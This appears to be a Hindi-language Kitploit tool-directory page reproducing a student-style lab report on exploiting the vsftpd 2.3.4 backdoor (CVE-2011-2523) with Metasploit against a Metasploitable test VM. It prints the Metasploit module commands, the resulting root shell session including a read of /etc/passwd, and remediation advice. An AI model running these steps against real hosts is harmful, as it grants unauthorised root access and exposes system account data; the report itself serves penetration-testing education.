Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
vsftpd-234-vuln-report — vsftpd 2.3.4 (CVE-2011-2523) का भेद्यता आकलन और शोषण Metasploit का उपयोग करके। पूर्ण रिपोर्ट और रूट एक्सेस का प्रमाण शामिल। | Kitploit
उपकरण/GitHubGitHub/vedpakhare/vsftpd-234-vuln-report
शोषण फ्रेमवर्कभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubvedpakhare/vsftpd-234-vuln-report

vsftpd-234-vuln-report

vsftpd 2.3.4 (CVE-2011-2523) का भेद्यता आकलन और शोषण Metasploit का उपयोग करके। पूर्ण रिपोर्ट और रूट एक्सेस का प्रमाण शामिल।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखेंवेबसाइट
21 साल पहलेअभी तक समीक्षित नहीं

💥 vsftpd 2.3.4 बैकडोर शोषण रिपोर्ट

vsftpd 2.3.4 में एक ज्ञात भेद्यता का Metasploit का उपयोग करके शोषण।

📌 लक्ष्य विवरण

  • लक्ष्य IP: 192.168.150.133
  • सेवा: FTP
  • भेद्य संस्करण: vsftpd 2.3.4
  • शोषण मॉड्यूल: exploit/unix/ftp/vsftpd_234_backdoor
  • पेलोड: कमांड शेल (TCP)

🔍 भेद्यता सारांश

vsftpd 2.3.4 में एक दुर्भावनापूर्ण बैकडोर है जो एक विशेष रूप से तैयार उपयोगकर्ता नाम (:) में समाप्त) प्राप्त होने पर पोर्ट 6200 पर एक कमांड शेल खोलता है।

CVE: CVE-2011-2523


🚀 शोषण चरण

root@kitploit:~
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.150.133
run

💥 शेल एक्सेस प्राप्त:

root@kitploit:~
whoami
> root

id
> uid=0(root) gid=0(root)

hostname
> metasploitable

uname -a
> Linux metasploitable 2.6.24-16-server #1 SMP ...

cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  ...

🔐 प्रभाव

रूट शेल एक्सेस हमलावर को लक्ष्य प्रणाली पर पूर्ण नियंत्रण देता है — जिसमें विशेषाधिकार वृद्धि, पार्श्व गति, डेटा निष्कासन और स्थायी पहुँच शामिल है।


✅ अनुशंसा

  • vsftpd 2.3.4 का उपयोग न करें।
  • एक सुरक्षित, समर्थित संस्करण में अपग्रेड करें।
  • FTP तक बाहरी पहुँच को प्रतिबंधित करें।
  • पोर्ट 6200 पर संदिग्ध ट्रैफ़िक की निगरानी करें।

📄 रिपोर्ट

📝 इस रिपॉजिटरी में पूर्ण PDF रिपोर्ट उपलब्ध है: vsftpd-exploit-report.pdf


📚 संदर्भ

  • Rapid7 मॉड्यूल जानकारी
  • CVE-2011-2523 - NVD

👨‍💻 लेखक

🔥 द्वारा बनाया गया vedpakhare

टूल डाउनलोड करें